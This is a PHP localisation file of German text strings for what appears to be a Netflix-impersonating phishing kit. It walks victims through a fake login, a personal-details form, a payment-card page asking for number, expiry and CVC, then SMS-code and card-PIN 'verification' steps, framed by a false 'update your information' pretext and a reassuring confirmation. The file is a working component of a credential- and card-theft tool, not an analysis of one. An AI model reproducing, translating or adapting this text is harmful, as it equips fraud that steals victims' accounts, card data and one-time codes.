<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "de",
        "xcapt" => "Bitte nehmen Sie sich einen Moment Zeit, um das hCaptcha unten zu lösen. Dies hilft uns sicherzustellen, dass Sie ein echter Benutzer sind und kein Bot, und bietet eine sichere Umgebung für alle.",
        "xcapt1" => "Bitte setzen Sie ein Häkchen im CAPTCHA-Feld.",
        "xcapt2" => "Verifikation",
        "xcapt3" => "Fortfahren",
        "xmain1" => "Einloggen",
        "xmain2" => "E-Mail-Adresse oder Telefonnummer",
        "xmain3" => "Bitte geben Sie eine gültige E-Mail-Adresse oder Telefonnummer ein.",
        "xmain4" => "Passwort",
        "xmain5" => "Ihr Passwort muss zwischen 4 und 60 Zeichen enthalten.",
        "xmain6" => "Einloggen",
        "xmain7" => "Benutzerdaten merken",
        "xmain8" => "Sie benötigen Hilfe?",
        "xmain9" => "Neu bei Netflix?",
        "xmain10" => " Jetzt registrieren.",
        "xmain11" => "Diese Seite ist durch Google reCAPTCHA abgesichert, um sicherzustellen, dass Sie kein Bot sind.",
        "xmain12" => "  Weitere Infos.",
        "xinfoz1" => "Persönliche Informationen",
        "xinfoz2" => "Vor- und Nachname",
        "xinfoz3" => "Dieses Feld ist erforderlich.",
        "xinfoz4" => "Geburtsdatum",
        "xinfoz5" => "Adresse",
        "xinfoz6" => "Stadt",
        "xinfoz7" => "Postleitzahl",
        "xinfoz8" => "E-Mail-Adresse",
        "xinfoz9" => "Telefonnummer",
        "xinfoz10" => "Die Felder in diesem Formular sind erforderlich, da wir diese Informationen für die Bearbeitung Ihrer Anfrage benötigen.",
        "xinfoz11" => "Fortsetzen",
        "xpay1" => "Konfigurieren Sie Ihre Zahlungskarte",
        "xpay2" => "Kartennummer",
        "xpay3" => "Kartennummer erforderlich.",
        "xpay4" => "Ablaufdatum",
        "xpay5" => "Ablaufdatum erforderlich.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV erforderlich.",
        "xpay8" => "End-to-End verschlüsselt",
        "xpay9" => "Fortsetzen",
        "xsms1" => "Überprüfung",
        "xsms2" => "Zu Ihrer Sicherheit müssen wir sicherstellen, dass Sie es sind.",
        "xsms3" => "Wir senden Ihnen eine SMS mit einem Sicherheitscode",
        "xsms4" => "Bitte geben Sie den erhaltenen Code ein",
        "xsms5" => "SMS-Code",
        "xsms6" => "Ungültiger SMS-Code",
        "xsms7" => "Dieser Schritt ist notwendig, um Ihre Anfrage sicher durchzuführen.",
        "xsms8" => "Fortsetzen",
        "xpin1" => "Überprüfung",
        "xpin2" => "Zu Ihrer Sicherheit müssen wir sicherstellen, dass Sie es sind.",
        "xpin3" => "Wir senden Ihnen eine SMS mit einem Sicherheitscode",
        "xpin4" => "Bitte geben Sie die PIN Ihres Kartencodes ein",
        "xpin5" => "PIN-Code",
        "xpin6" => "Ungültiger PIN-Code",
        "xpin7" => "Dieser Schritt ist notwendig, um Ihre Anfrage sicher durchzuführen.",
        "xpin8" => "Fortsetzen",
        "xexpl1" => "Aktualisierung",
        "xexpl2" => "Wir hoffen, dass diese Mitteilung Sie gut erreicht. Es ist wichtig, Ihre Informationen auf unserer Plattform zu aktualisieren, um eine kontinuierliche und sichere Benutzererfahrung zu gewährleisten.",
        "xexpl3" => "Um unsere Dienstleistungen zu verbessern und die Sicherheit Ihres Kontos zu gewährleisten, nehmen Sie sich bitte einen Moment Zeit, um Ihre Informationen zu aktualisieren.",
        "xexpl4" => "Fortsetzen",
        "xconf1" => "Bestätigung",
        "xconf2" => "Wir danken Ihnen aufrichtig, dass Sie sich die Zeit genommen haben, Ihre Informationen auf unserer Plattform zu aktualisieren. Ihr Engagement für die Sicherheit und Genauigkeit der Details Ihres Kontos ist für uns von entscheidender Bedeutung.",
        "xconf3" => "Ihre Änderungen wurden erfolgreich gespeichert. Sie können nun unsere Plattform in vollem Umfang mit den neuesten und aktuellsten Informationen nutzen.",
        "xconf4" => "Fortsetzen",
        "xload1" => "Verarbeitung läuft...",
        "xload2" => "Verlassen Sie diese Seite nicht.",
        "xfoot1" => "Fragen? Kontaktieren Sie uns.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Hilfezentrum",
        "xfoot4" => "Nutzungsbedingungen",
        "xfoot5" => "Datenschutz",
        "xfoot6" => "Cookie-Einstellungen",
        "xfoot7" => "Unternehmensinformationen",
        "xfoot8" => "Deutsch"
    );

    return $lang[$phrase];
}
?>
